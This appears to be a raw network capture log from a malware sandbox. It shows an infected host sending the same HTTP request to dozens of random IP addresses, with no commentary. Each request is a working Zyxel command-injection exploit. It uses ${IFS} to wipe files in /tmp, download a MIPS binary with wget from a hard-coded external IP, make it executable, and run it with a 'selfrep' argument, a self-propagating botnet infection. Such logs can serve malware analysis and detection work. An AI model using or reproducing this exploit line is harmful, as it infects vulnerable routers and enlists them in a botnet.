                                    Jan 13, 2024 19:02:39.296247005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5684192.168.2.1358532190.239.3.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296308994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5685192.168.2.135184265.158.47.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296353102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5686192.168.2.134511280.5.72.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296416998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5687192.168.2.1346522149.183.64.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296446085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5688192.168.2.1333432152.8.49.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296509027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5689192.168.2.1353290140.44.144.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296669960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5690192.168.2.135466485.94.240.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296776056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5691192.168.2.1355302196.26.88.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296854019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5692192.168.2.1351880157.157.78.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296922922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5693192.168.2.1337942152.201.35.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296992064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5694192.168.2.135635696.180.110.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297066927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5695192.168.2.13583921.209.75.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297130108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5696192.168.2.135899498.136.200.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297194004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5697192.168.2.1339330219.188.16.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297287941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5698192.168.2.135657461.64.159.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297326088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5699192.168.2.1348396106.97.28.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297353029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5700192.168.2.135032094.48.150.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297430038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5701192.168.2.1334312168.250.60.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297472954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5702192.168.2.1334346211.249.163.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297513008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5703192.168.2.1350236220.186.63.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297580957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5704192.168.2.135429495.87.47.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297620058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5705192.168.2.133529492.167.243.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297667027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5706192.168.2.134115092.110.59.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297668934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5707192.168.2.135511234.94.135.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297729015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5708192.168.2.1340756143.50.100.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297786951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5709192.168.2.1343826103.234.103.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297854900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5710192.168.2.1332812182.6.68.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297904968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5711192.168.2.1357020217.172.197.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.297960043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5712192.168.2.1360470175.126.32.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298007965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5713192.168.2.1350148199.151.101.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298069954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5714192.168.2.1354808199.223.225.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298106909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5715192.168.2.133305899.95.12.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298176050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5716192.168.2.1357028125.202.220.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298245907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5717192.168.2.134152899.59.14.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298296928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5718192.168.2.1353068124.116.43.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298377037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5719192.168.2.1348674177.41.109.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298445940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5720192.168.2.1338634184.236.64.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298501968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5721192.168.2.136040424.130.23.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298542023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5722192.168.2.133590220.222.20.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298604965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5723192.168.2.1340832117.170.48.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298655987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5724192.168.2.1357826162.46.180.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298691034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5725192.168.2.134798298.155.44.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298743010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5726192.168.2.1346606203.49.10.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298784018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5727192.168.2.135874876.154.74.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298849106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5728192.168.2.1350992220.221.246.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.298959017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5729192.168.2.135387273.147.220.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299004078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5730192.168.2.1345182115.177.56.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299040079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5731192.168.2.1332842207.94.27.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299099922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5732192.168.2.1354484151.159.178.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299143076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5733192.168.2.135745250.171.217.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299190044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5734192.168.2.1333764167.23.169.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299232960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5735192.168.2.1343306146.52.208.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299308062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5736192.168.2.1357414166.248.115.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299343109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5737192.168.2.1347920187.2.5.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299407959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5738192.168.2.13579525.144.51.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299474955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5739192.168.2.1338918138.217.201.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299506903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5740192.168.2.1334282156.33.226.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299563885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5741192.168.2.134601066.53.102.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299616098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5742192.168.2.134581814.40.227.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299702883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5743192.168.2.1340692221.31.29.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299734116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5744192.168.2.135868027.130.159.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299783945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5745192.168.2.1342262145.194.77.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299822092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5746192.168.2.134306871.55.16.56443
                                    TimestampBytes transferredDirectionData
